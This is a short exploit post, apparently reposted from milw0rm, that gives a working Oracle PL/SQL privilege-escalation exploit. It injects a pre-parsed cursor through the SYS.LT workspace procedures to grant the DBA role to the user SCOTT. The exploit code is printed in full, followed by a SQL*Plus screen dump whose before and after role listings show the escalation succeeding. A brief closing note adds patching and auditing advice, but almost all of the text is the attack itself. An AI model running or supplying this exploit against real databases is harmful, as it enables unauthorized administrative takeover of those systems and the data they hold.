This is a slightly modified version of: http://milw0rm.com/exploits/7677

This is based on cursor injection and does not need create function privileges:

DECLARE
D NUMBER;
BEGIN
D := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott'';commit;end;',0);
SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');
SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');
end;

#-----------screen dump---------------------------------------------------#

SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT                          CONNECT                        NO  YES NO
SCOTT                          EXECUTE_CATALOG_ROLE           NO  YES NO
SCOTT                          RESOURCE                       NO  YES NO

SQL> DECLARE
  2  D NUMBER;
  3  BEGIN
  4  D := DBMS_SQL.OPEN_CURSOR;
  5  DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott'';commit;end;',0);
  6  SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');
  7  SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');
  8  end;
  9
 10
 11  /
DECLARE
*
ERROR at line 1:
ORA-01403: no data found
ORA-06512: at "SYS.LT", line 6118
ORA-06512: at "SYS.LT", line 6087
ORA-06512: at line 7

SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT                          CONNECT                        NO  YES NO
SCOTT                          DBA                            NO  YES NO
SCOTT                          EXECUTE_CATALOG_ROLE           NO  YES NO
SCOTT                          RESOURCE                       NO  YES NO

Note: the block ends with ORA-01403, but the second listing shows the DBA role was still granted. The pre-parsed cursor runs as an autonomous transaction with its own commit, so the error raised afterwards inside SYS.LT does not roll it back. On the defensive side, the fix is the vendor patch for the SYS.LT procedures. Until it is applied, restrict EXECUTE on the LT package where Workspace Manager is not needed, and audit DBA_ROLE_PRIVS for unexpected DBA grants.

Sid
www.notsosecure.com

#From:milw0rm